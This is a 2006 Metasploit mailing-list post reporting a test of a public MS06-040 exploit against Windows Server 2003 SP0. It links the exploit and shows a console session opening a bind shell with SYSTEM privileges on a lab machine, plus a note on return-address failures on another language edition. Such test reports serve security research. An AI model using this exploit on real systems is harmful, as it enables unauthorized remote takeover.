Metasploit mailing list archives

MS06-040 Exploit for Windows Server 2003 SP0


From: jerome.athias at free.fr (Jerome Athias)
Date: Thu, 14 Sep 2006 09:16:40 +0200

Hi,

http://milw0rm.com/exploits/2355
successfully tested against Windows 2003 Web Edition SP0 US

msf netapi_win2003(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Sending request...
[*] The server rejected it, trying again...
[*] Got connection from 192.168.0.5:34047 <-> 192.168.0.30:4444

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 192.168.0.30
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.0.254

C:\WINDOWS\system32>


PS: tested as is against 2003 Standard Edition FRench SP0 - not working 
(/return addresses ...)

/JA



Current thread: